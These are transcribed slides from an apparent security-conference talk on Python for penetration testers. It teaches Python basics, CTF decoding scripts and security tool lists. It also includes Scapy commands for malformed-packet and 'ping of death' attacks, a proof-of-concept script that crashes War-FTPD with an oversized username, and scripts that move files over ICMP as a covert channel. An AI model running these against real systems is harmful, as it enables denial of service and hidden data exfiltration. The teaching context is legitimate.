Presentation is loading. Please wait.

Presentation is loading. Please wait.

>>>import antigravity. Overview of Python Flying made simple without the Nyquil hangover Keith

Similar presentations


Presentation on theme: ">>>import antigravity. Overview of Python Flying made simple without the Nyquil hangover Keith"— Presentation transcript:

1 >>>import antigravity

2

3 Overview of Python Flying made simple without the Nyquil hangover Keith

4 Agenda About me About Python Python basics Python’s uses Coding for Penetration Testers book Tips, tricks, observations Resources

5 Who am I? Husband/father/geek/gets distracted by shiny objects easy Career path switched to IT in 1999, professionally in IT since 2001 – Learning, studying, and currently interviewing for infosec professional roles Vbscript – 2007 Python – 2011 About me

6 About Python Conceived in the late 1980’s by Guido van Rossum at CWI. Python 3.0 was released on December 2008 Python 2.0 was release on October 16 th, 2000

7 What is Python good for? Python comes with a large standard library that covers areas such as; string processing Internet protocols software engineering operating system interfaces Artificial intelligence (because of similarities to Lisp)

8 What is Python good for? Extensive use in the information security industry Exploit development Network Debugging Reverse engineering fuzzing, Web Forensics Malware analysis PDF

9 What is Python good for? Easy to write short scripts for system admin work. Python code is easy to understand. Once the basic syntax is learned, even the most complicated scripts can make sense.

10 What is Python good for? Python is cross platform!! It will work on Linux, Windows, Mac and most every other OS. Many, many resources and a big, friendly community

11 Python tools Social-Engineer Toolkit - specifically designed to perform advanced attacks against the human element. Artillery - a honeypot/monitoring/prevention tool used to protect Linux-based systems. Fast-Track - aimed at helping Penetration Testers in an effort to identify, exploit, and further penetrate a network. Scapy - send, sniff and dissect and forge network packets. Usable interactively or as a library Pytbull - flexible IDS/IPS testing framework (shipped with more than 300 tests) Scrapy - a fast high-level screen scraping and web crawling framework, used to crawl websites and extract structured data from their pages W3af - a Web Application Attack and Audit Framework.

12 Inspiration for the idea? (Part 1)

13 Post CSAW CTF Inspiration for the idea? (Part 2)

14

15 Python 101 Indentation does matter This will work startNumber = int(raw_input("Enter the start number here ")) endNumber = int(raw_input("Enter the end number here ")) def fib(n): if n < 2: return n return fib(n-2) + fib(n-1) print map(fib, range(startNumber, endNumber)) But this won’t… startNumber = int(raw_input("Enter the start number here ")) endNumber = int(raw_input("Enter the end number here ")) def fib(n): if n < 2: return n return fib(n-2) + fib(n-1) print map(fib, range(startNumber, endNumber))

16 Python 101 All scripts are considered modules All functions inside module can be used or only certain methods can be used inside script Entire modulePartial method >>> import sys >>> from sys import argv Help is built in Help on modulesHelp on methods >>> Import sys, hashlib >>> help(sys) >>> help(hashlib) ~$ pydoc sys ~$ pydoc hashlib >>> Import sys, hashlib >>> help(sys.argv) >>> help(hashlib.sha512) ~$ pydoc sys.argv ~$ pydoc hashlib.sha512

17 Python 101 Scripts WindowsLinux File extensions *.py – Python script *pyc – Compiled Python file (generated by running script) Running scripts.py file extension associated with python.exe Should have #!/usr/bin/python at the top of the script in case you want to run it on Linux If the path to the interpreter is in your system path, you can doubleclick script to run, otherwise… C:\Users\Keith>python password.py File extensions (optional) *.py – Python script *pyc – Compiled Python file (generated by running script) Running scripts Must have #!/usr/bin/python (path to python) at the top of the script If you’re running it from the terminal, the script must be chmod’ed to make it executable or you can call python and the script name… ~ $ python password.py It can be ran interactively Via command promptVia shell ~ $ python Python 2.72 Type “help”, “copyright”.. >>> IDLE DreamPie Ipython

18 Python 102 Conditional statements If statementElse statementElif statement if x = true: print true if x = 1: print “1” else: print “not 1” if expression1: statement(s) elif expression2: statement(s) else: statement(s) Data types NumbersStringList (mutable)Tuple (non mutable) A = 10 B = 0100 or B = 0x41 or B = 0b C = 3.56 D = 3.16j Integers Long integers (octal, hex, binary) Float complex A = ‘This is a string’ print A print A[0] print A[3:6] print A[4:] print A * 2 print A + “ and this is how it prints” 'This is a string' ‘T’ ‘s i’ ‘ is a string’ list = [‘abc’, 45, ‘The Avengers’, 0x67, ‘def’, 15.5] print list print list [0] print list [1:3] print list[2:] list.append[“Detroit”] list = [‘abc’, 45, ‘The Avengers’, 0x67, ‘def’, 15.5,’Detroit’] list = (‘abc’, 45, ‘The Avengers’, 0x67, ‘def’, 15.5) print list print list [0] print list [1:3] print list[2:] list.append(“Detroit”) AttributeError: 'tuple' object has no attribute 'append’

19 Python 102 Functions Creating a functionIn use def base64_decode(base64_key): answer=base64_key.decode('base64','strict') print answer >>>csaw.base64_decode(‘V2VsY29tZSB0byBCc2lkZXMgRG V0cm9pdCAyMDEyLiBNYWtlIHN1cmUgdG8gdGhhbmsgUnl hbiwgU3RldmVuLCBXb2xmZ2FuZywgYW5kIEt5bGUgZm9yI GFsbCB0aGUgaGFyZCB3b3JrIHRoZXkgZGlkIHRvIG1ha2Ugd GhpcyB5ZWFyIHN1Y2ggYSBzdWNjZXNzIQ==‘) >>> Welcome to Bsides Detroit Make sure to thank Ryan, Steven, Wolfgang, and Kyle for all the hard work they did to make this year such a success! Looping While loopFor loopLoop control count = 0 while (count < 9): print 'The count is:', count count = count + 1 print "Good bye!" code1 = (sys.argv[1]) code_split = code1.split(':') for i in code_split: code1a = int(i) codefinal = chr(code1a) sys.stdout.write(codefinal) count = 0 while (count < 9): print 'The count is:', count count = count + 1 if count = 7: break print "Good bye!"

20 Python 102 Files Open a file for readingWrite to a file #!/usr/bin/python f = open ('base64.txt', 'r') file = f.read() answer=file.decode('base64','strict') print answer f.close ( ) #!/usr/bin/python import sys if len(sys.argv)<2: sys.exit("Usage " + sys.argv[0] + " \n") basecode = sys.argv[1] answer=basecode.decode('base64','strict') print answer fo = open("base64.txt", "w") fo.write(answer) fo.close() Input/output raw_inputinput #!/usr/bin/python str = raw_input("Enter your input: "); print "Received input is : ", str Input is  Thanks for coming to Bsides Output is  Received input is : Thanks for coming to Bsides #!/usr/bin/python str = input("Enter your input: "); print "Received input is : ", str Input is  5 * 5 Output is  25

21 Python’s uses – General scripting Cryptography Password creation Use files (write to/read from)

22 Encode ROT13 code #!/usr/bin/python code = raw_input("Enter the data you wish to be encoded to Base64") answer=code.encode('base64','strict') print answer Encode Base64 code Cryptography #!/usr/bin/python code = raw_input("Enter the data you wish to be encoded to Base64") answer=code.encode('base64','strict') print answer

23 Decrypt module #!/usr/bin/python import sys def hexdecode(hex_key): import binascii hex_split = hex_key.split(':') for decode in hex_split: hex_decode = binascii.a2b_hex(decode) sys.stdout.write(hex_decode) def uni_decode(unicode_key): unicode_split=unicode_key.split(':') for i in unicode_split: code1a = int(i) codefinal = chr(code1a) sys.stdout.write(codefinal) def base64_decode(base64_key): answer=base64_key.decode('base64','strict') print answer def binary_decode(binary_key): import math f = lambda v, l: [v[i*l:(i+1)*l] for i in range(int(math.ceil(len(v)/float(l))))] basecode = f (binary_key,8) for code in basecode: x = (code) decodea = int(code,2) decodeb = chr(decodea) sys.stdout.write(decodeb) def rot13_decode(rot13_key): answer=rot13_key.decode('rot13','strict') print answer

24 Decrypt module

25

26 Password creation ##Author: ATC ##Please score this on activestate import string, random print "How many characters would you like the password to have?" print "Must be nine or more" length = input () password_len = length password = [] for group in (string.ascii_letters, string.punctuation, string.digits): password += random.sample(group, 3) password += random.sample( string.ascii_letters + string.punctuation + string.digits, password_len - len(password)) random.shuffle(password) password = ''.join(password) print password

27 Use files (write to/read from) #!/usr/bin/python f = open ('base64.txt', 'r') file = f.read() answer=file.decode('base64','strict') f.close ( ) Read from a file #!/usr/bin/python code = raw_input("Enter the data you wish to be encoded to Base64") answer=code.encode('base64','strict') f=open('base64.txt','w') line=f.write(answer) f.close ( ) Write to a file

28 Python’s uses – Networking Scapy: send, sniff and dissect and forge network packets. Usable interactively or as a library Scapy Pytbull: flexible IDS/IPS testing framework (shipped with more than 300 tests) Pytbull Mallory, man-in-the-middle proxy for testing Mallory mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows to be inspected and edited on the fly mitmproxy Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB Impacket Knock Subdomain Scan, enumerate subdomains on a target domain through a wordlist Knock Subdomain Scan pypcap, Pcapy and pylibpcap: several different Python bindings for libpcap pypcapPcapypylibpcap libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission libdnet dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols dpkt pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection pynids Dirtbags py-pcap: read pcap files without libpcap Dirtbags py-pcap flowgrep: grep through packet payloads using regular expressions flowgrep httplib2: comprehensive HTTP client library that supports many features left out of other HTTP libraries httplib2

29 Scapy Packet creation Read PCAP files Create graphical dumps Must have appropriate supporting tools installed Fuzzing Send and receive packets TCP traceroute (can do graphical dump as well) Sniffing Send and receive files through alternate data channels (ICMP) Ping ARP ping ICMP ping TCP ping UDP ping Wireless frame injection OS Fingerprinting Classic attacks Malformed packets Ping of death Nestea attack ARP cache poisoning Scans SYN scan ACK scan XMAS scan IP scan TCP port scan IKE scan Advanced traceroute TCP SYN traceroute UDP traceroute DNS traceroute VLAN hopping Wireless sniffing Firewalking

30 Scapy Packet creation Stacking layers

31 Scapy Read PCAP files A=rdpcap(“ / ”) Create graphical dumps A[ ].psdump(“, layer_shift=1)

32 Scapy ConfickerB9hrs.pcap

33 Scapy Send packets send(IP(dst=“ ")/ICMP()) sendp(Ether()/IP(dst=" ",ttl=(1,4)), iface="eth0") sendp(rdpcap("/tmp/pcapfile"))

34 Scapy

35 Scapy sendp("I’m travelling on Ethernet", iface="eth0", loop=1, inter=0.2)

36 Scapy Send and receive packets p=sr1(IP(dst="www.slashdot.org") /ICMP()/"XXXXXXXXXXX") p=sr1(IP(dst="www.slashdot.org") /ICMP()/" ABCDEFGHIJ ") p.show()

37 Scapy Send and receive packets p=sr1(IP(dst="www.slashdot.org")/ICMP()/“ABCDEFGHIJ")

38 Send and receive packets sr(IP(dst=" ")/TCP(dport=[21,22,23])) sr(IP(dst=" ")/TCP(dport=[21,22,23]),inter=0.5,retry=-2,timeout=1)Scapy

39 Scapy Fuzzing send(IP(dst=“ ")/fuzz(ICMP()/NTP(version=4)),loop=1) send(IP(dst=" ")/fuzz(TCP()/NTP(version=4)),loop=1)

40 Scapy TCP traceroute res,unans = traceroute(["www.microsoft.com","www.cisco.com","www.yahoo.com ],dport=[80,443],maxttl=20,retry=-2) "

41 Scapy

42 Sniffing sniff(filter="icmp and host ", count=2) a=_ a.nsummary() a[1]Scapy sniff(iface="eth0", prn=lambda x: x.show())

43 Scapy

44 Scapy SYN scan sr1(IP(dst=" ")/TCP(dport=80,flags="S")) sr(IP(dst=" ")/TCP(sport=666,dport=(440,443),flags="S")) sr(IP(dst=" ")/TCP(sport=RandShort(),dport=[440,441,442,443],flags="S")) ans.summary() ans.summary( lambda(s,r): r.sprintf("%TCP.sport% \t %TCP.flags%") )

45 Scapy Classic attacks Malformed packets send(IP(dst=" ", ihl=2, version=3)/ICMP()) Ping of death send( fragment(IP(dst=" ")/ICMP()/("X" * 60000)) )

46 Scapy send(IP(dst=" ", ihl=2, version=3)/ICMP()) send( fragment(IP(dst=" ")/ICMP()/("X" * 60000)) )

47 Scapy

48 Scapy #!/usr/bin/python import sys from scapy.all import * conf.verb = 0 f = open(sys.argv[1]) data = f.read() f.close() host = sys.argv[2] print "Data size is %d " %len(data) i = 0 while i

49 Scapy #!/usr/bin/python import sys from scapy.all import * conf.verb=0 f=open(sys.argv[1],"w") host=sys.argv[2] count = int(sys.argv[3]) filter="icmp and host " + host print "sniffing with filter (%s) for %d bytes" % (filter,int(count)) packets = sniff(count,filter=filter) for p in packets: f.write(p['Raw'].load) f.close() print "Data received"

50 Python’s uses – Debugging and Reverse Engineering Immunity Debugger: scriptable GUI and command line debugger Immunity Debugger mona.py: PyCommand for Immunity Debugger that replaces and improves on pvefindaddr mona.py Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH PaimeiPyDBG IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro IDAPython pefile: read and work with Portable Executable (aka PE) files pefile pydasm: Python interface to the libdasm x86 disassembling library pydasmlibdasm PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine PyDbgEng uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory uhooker diStorm64: disassembler library for AMD64, licensed under the BSD license diStorm64 python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python python-ptrace vdb / vtrace: vtrace is a cross-platform process debugging API implemented in python, and vdb is a debugger which uses it (mirror) vdb / vtracemirror Androguard: reverse engineering and analysis of Android applications Androguard

51 Coding for Pentesters - Exploitation scripting

52 Coding for Pentesters – Exploitation scripting Building Exploits with Python 1.Windows XP SP0 2.War-FTPD v Immunity Debugger

53 Coding for Pentesters – Exploitation scripting Step 1 – Open WarftpD with Immunity

54 Coding for Pentesters – Exploitation scripting Step 2 – Run WarFTPD by pressing F9 and then set it to GoOnline.

55 Coding for Pentesters – Exploitation scripting Step 3 – Build this script and run it…. and enjoy the show #!/usr/bin/python import sys import socket hostname = sys.argv[1] username = "A"*1024 passwd = "anything" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: sock.connect((hostname, 21)) except: print ("[-] Connection error!") sys.exit(1) r = sock.recv(1024) print "[+] " + r sock.send("user %s\r\n" %username) r = sock.recv(1024) print "[+] " + r sock.send("pass %s\r\n" %passwd) r = sock.recv(1024) print "[+] " + r sock.close()

56 Coding for Pentesters – Exploitation scripting The connection attempt with the user name of AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

57 Coding for Pentesters – Exploitation scripting

58 Step 4 - WarFTPD crashes!

59 Python’s uses – Malware analysis torwget.py: Multi-platform TOR-enabled URL clamav_to_yara.py: Convert ClamAV antivirus signatures to YARA rules peid_to_yara.py: Convert PEiD packer signatures to YARA rules av_multiscan.py: Script to implement your own antivirus multi- scanner pescanner.py: Detect malicious PE file attributes ssdeep_procs.py: Detect self-mutating code on live Windows systems using ssdeep avsubmit.py: Command-line interface to VirusTotal, ThreatExpert, Jotti, and NoVirusThanks dbmgr.py: Malware artifacts database manager artifactscanner.py: Application to scan live Windows systems for artifacts (files, Registry keys, mutexes) left by malware mapper.py: Create static PNG images of IP addresses plotted on a map using GeoIP googlegeoip.py: Create dynamic/interactive geographical maps of IP addresses using Google charts sc_distorm.py: Script to produce disassemblies (via DiStorm) of shellcode and optionally apply an XOR mask vmauto.py: Python class for automating malware execution in VirtualBox and VMware guests mybox.py: Sample automation script for VirtualBox based on vmauto.py

60 Python’s uses – Malware analysis myvmware.py: Sample automation script for VMware based on vmauto.py analysis.py: Python class for building sandboxes with support for analyzing network traffic, packet captures, and memory scd.py: Immunity Debugger PyCommand for finding shellcode in arbitrary binary files findhooks.py: Immunity Debugger PyCommand for finding Inline-style user mode API hooks pymon.py: WinAppDbg plug-in for monitoring API calls, alerting on suspicious flags/parameters and producing an HTML report xortools.py: Python library for encoding/decoding XOR, including brute force methods and automated YARA signature generation trickimprec.py: Immunity Debugger PyCommand for assistance when rebuilding import tables with Import REconstructor kraken.py: Immunity Debugger PyCommand for cracking Kraken’s Domain Generation Algorithm (DGA) sbstrings.py: Immunity Debugger PyCommand for decrypting Silent Banker strings install_svc.py: Python script for installing a service DLL and supplying optional arguments to the service dll2exe.py: Python script for converting a DLL into a standalone executable windbg_to_ida.py: Python script to convert WinDbg output into data that can be imported into IDA

61 Python’s uses – Malware analysis Practical Malware Analysis FakeNet -

62 Python’s uses – Malware analysis Cuckoo Sandbox - a malware analysis system used to analyze Windows executables, DLL files, PDF documents, Office documents, PHP scripts, Python scripts, Internet URLs and almost anything else you can imagine. Cuckoo Sandbox yara-python: identify and classify malware samples yara-python pyew: command line hexadecimal editor and disassembler, mainly to analyze malware pyew Exefilter: filter file formats in s, web pages or files. Detects many common file formats and can remove active content Exefilter pyClamAV: add virus detection capabilities to your Python software pyClamAV jsunpack-n, generic JavaScript unpacker: emulates browser functionality to detect exploits that target browser and browser plug-in vulnerabilities jsunpack-n phoneyc: pure Python honeyclient implementation phoneyc

63 Python’s uses – Fuzzing Sickfuzz: a fuzzer made out of several custom.spk files and a python script to wrap them up, including some tshark support and other features. Sickfuzz Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components Sulley Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing Peach Fuzzing Platform antiparser: fuzz testing and fault injection API antiparser TAOF, including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer TAOFProxyFuzz Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer) Powerfuzzer FileP: file fuzzer. Generates mutated files from a list of source files and feeds them to an external program in batches FileP Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns Mistress Fuzzbox: multi-codec media fuzzer Fuzzbox Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems Forensic Fuzzing Tools Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms Windows IPC Fuzzing Tools WSBang: perform automated security testing of SOAP based web services WSBang Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner Construct fuzzer.py (feliam): simple fuzzer by Felipe Andres Manzano fuzzer.py (feliam) Fusil: Python library used to write fuzzing programs Fusil

64 Python’s uses – Fuzzing Sickfuzz

65 Python’s uses – Web Scrapy: a fast high-level screen scraping and web crawling framework, used to crawl websites and extract structured data from their pages. It can be used for a wide range of purposes, from data mining to monitoring and automated testing. Scrapy: ProxMon: processes proxy logs and reports discovered issues ProxMon Twill: browse the Web from a command-line interface. Supports automated Web testing Twill Windmill: web testing tool designed to let you painlessly automate and debug your web application Windmill FunkLoad: functional and load web tester FunkLoad spynner: Programmatic web browsing module for Python with Javascript/AJAX support spynner python-spidermonkey: bridge to the Mozilla SpiderMonkey JavaScript engine; allows for the evaluation and calling of Javascript scripts and functions python-spidermonkey

66 Python’s uses – Web

67 Python’s uses – Forensics Volatility: extract digital artifacts from volatile memory (RAM) samples Volatility SandMan: read the hibernation file, regardless of Windows version SandMan LibForensics: library for developing digital forensics applications LibForensics TrIDLib, identify file types from their binary signatures. Now includes Python binding TrIDLib aft: Android forensic toolkit aft

68 Python’s uses – Forensics Volatility

69 Python’s uses – Miscellaneous InlineEgg: toolbox of classes for writing small assembly programs in Python InlineEgg Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging Exomind RevHosts: enumerate virtual hosts for a given IP address RevHosts simplejson: JSON encoder/decoder, e.g. to use Google's AJAX API simplejsonGoogle's AJAX API PyMangle: command line tool and a python library used to create word lists for use with other penetration testing tools (abandoned?) PyMangle Hachoir: view and edit a binary stream field by field Hachoir Other useful libraries and tools IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system IPython Beautiful Soup: HTML parser optimized for screen-scraping Beautiful Soup Mayavi: 3D scientific data visualization and plotting Mayavi Twisted: event-driven networking engine Twisted Suds: lightweight SOAP client for consuming Web Services Suds M2Crypto: most complete OpenSSL wrapper M2Crypto NetworkX: graph library (edges, nodes) NetworkX pyparsing: general parsing module pyparsing lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language lxml Whoosh: fast, featureful full-text indexing and searching library implemented in pure Python Whoosh Pexpect: control and automate other programs, similar to Don Libes `Expect` system Pexpect Sikuli, visual technology to search and automate GUIs using screenshots. Scriptable in Jython SikuliJython PyQt and PySide: Python bindings for the Qt application framework and GUI library PyQtPySide

70 ScriptFunctionLearned Webcheck_v1.pyMonitor web server – verify it remains up 1.Script arguments 2.Connect to web server and run a GET request Webcheck_v2.pyMonitor web server – verify it remains up (default to port 80) 1.Alternate script arguments method Subnetcalc.pyCalculate subnet mask, broadcast address, network range, and gateway from IP/CIDR 1.Parse out values programmatically 2.Math functions with variables 3.Displaying results 4.Using FOR loops Pass.pyDetermines if users are using the original default assigned password 1.Use the crypt module Robotparser.pyRetrieve the paths from the robot.txt 1.Parse the robots.txt file with the built robotparser module 2.Nesting FOR loops root_check.pyChecks to see what permissions logged in account has (normal user, root or system account) 1.Using IF and ELIF conditional statements 2.Use OS module to make system calls Readshadow.pyChecks to see if you have permission to read /etc/shadow 1.Use OS module to make system calls 2.Tests permissions on files to see if current credentials can read file Network_socket.pyConnect to website, pull contents (hard coded) 1.Network socket creation 2.Spaces will bite you in the ass where you least expect it. Coding for Penetration Testers book

71 ScriptFunctionLearned network_socket_argum ent.py Connect to website, pull contents (site specified by argument) 1.Network socket creation 2.Spaces will bite you in the ass where you least expect it. Server_connect.pyOnce a connection is made, send back a string 1.Network socket creation 2.Allow incoming connections. receiveICMP.pyTo receive a file from another system via ICMP (in conjunction with sendICMP.py) 1.Python script using Scapy sendICMP.pyTo send a file to another system via ICMP (in conjunction with receiveICMP.py) 1.Python script using Scapy Coding for Penetration Testers book

72 DescriptionFunctionSite Python-nmapIt’s a Python library which helps in using nmap. nmap/ Python API to the VirtualBox VM Allowing you to control every aspect of virtual machine configuration and execution /SDKRef.pdf Py2Exepy2exe is a Python Distutils extension which converts Python scripts into executable Windows programs, able to run without requiring a Python installation.PythonDistutils Chrome extensions/applications Various extensions/applications found in the Chrome Webstore https://chrome.google.com/webstore/ detail/gdiimmpmdoofmahingpgabiikim jgcia <-- Python shell (browser button) https://chrome.google.com/webstore/ detail/gdiimmpmdoofmahingpgabiikim jgcia https://chrome.google.com/webstore/ detail/cmlchnlmkdcpelgmkebknjgjgdd ncelc - Python shell (Chrome application) https://chrome.google.com/webstore/ detail/cmlchnlmkdcpelgmkebknjgjgdd ncelc https://chrome.google.com/webstore/ detail/nckbgikkpbjdliigbhgjfgfcahhona kp <-- Online Python development environment https://chrome.google.com/webstore/ detail/nckbgikkpbjdliigbhgjfgfcahhona kp Little gems I found

73 DescriptionFunctionSite TweepyIt’s the best working Python library to interface with Twitter (so far) Extra extra creditLittle gems I found

74 Tweepy Direct message Check friends timelines Create favorites

75 Tips, tricks, etc. IDE (http://wiki.python.org/moin/IntegratedDevelopmentEnvironments)http://wiki.python.org/moin/IntegratedDevelopmentEnvironments Windows PyScripter Aptana Studio IDLE Ninja Wing IDE Linux IDLE Geany Python Toolkit SPE ERIC (supposed to have auto-complete of code…) Editors (http://wiki.python.org/moin/PythonEditors)http://wiki.python.org/moin/PythonEditors Windows Notepad++ Linux Gedit SCiTE

76 Tips, tricks, etc. Shells DreamPie Automatic of completion of attributes and file names History box Code box IDLE Included with Python install Ipython PyShell Guake Other PythonAnywhere

77 Tips, tricks, etc. Linux vs. Windows Linux Linux scripts can be ran via terminal calling python by putting #!/usr/bin/python at the top (path to interpreter) and typing./ Common problem on PyScripter (awesome Windows Python IDE)… extra code comments are put at the top, then the #! /usr/bin/python Windows Windows scripts don’t need the #! but need to have.py associated with Python interepreter. Scripts can be double clicked or ran from command prompt python If the script is double clicked, without having raw_input("Press ENTER to exit") you may not see the output of the script.

78 Tips, tricks, etc. Portable PythonPortable Python (Windows only) Portable Python is a Python® programming language preconfigured to run directly from any USB storage device, enabling you to have, at any time, a portable programming environment. Just download it, extract to your portable storage device or hard drive and in 10 minutes you are ready to create your next Python® application. Portable Python package contains following applications/libraries: PyScripter v2.4.1 NymPy SciPy 0.90 Matplotlib PyWin Django 1.3 PIL Py2Exe wxPython Portable Python package contains following applications/libraries (alphabetical order): NetworkX v1.4 PySerial 2.5 PyScripter v2.4.1 PyWin32 v.216 RPyC-3.0.7

79 Additional resources

80 Beginners guides from Python Extra tools Online exercises General learning materials Additional resources

81 Free online videos Online books Online interactive tutorial/interpreter https://languageshells.appspot.com/ Forums Module/package repositories The Python Package Index is a repository of software for the Python programming language. There are currently packages here. The ActiveState Code Recipes contains 3850 snippets to learn from and use. Python tools for penetration testers Additional resources

82 Training SecurityTube Python Scripting Expert python-scripting-expert/?id=main python-scripting-expert/?id=main Module 1: Python Scripting – Language Essentials Module 2: System Programming and Security Module 3: Network Security Programming – Sniffers and Packet Injectors Module 4: Attacking Web Applications Module 5: Exploitation Techniques Module 6: Malware Analysis and Reverse Engineering Module 7: Attack Task Automation Module 8: Further Study and Roadmap Module 9: Exam Pattern and Mock Exam PYTHON TRAINING FOR SECURITY PROFESSIONALS Log Parsing with Python Pcap Parsing with Python Network Attack with Python Web Application Attack with Python Malware Analysis with Python Exploit Development with Python

83 CategoryScript CSAW Crypto Redux – Challenge 1 to 5 Extra credit Coding for Penetration Testers – part 1 Coding for Penetration Testers – part 2 Coding for Penetration Testers – part 3 Extra extra credit All the scripts

84 Antigravity When you open up ModulesDocs and click on antigravity module or from IDLE run import antigravity, a web browser opens to the XKCD cartoon at the beginning of this slide deck. Zen of Python To start the path of finding Zen of Python, remember these two key words… IMPORT THIS. From an IDE (IDLE) or a Python shell, run import this and the Zen of Python will be revealed. Etc.

85

86 Final thoughts

87 Questions? Keith #misec – Tazdrumm3r


Download ppt ">>>import antigravity. Overview of Python Flying made simple without the Nyquil hangover Keith"

Similar presentations


Ads by Google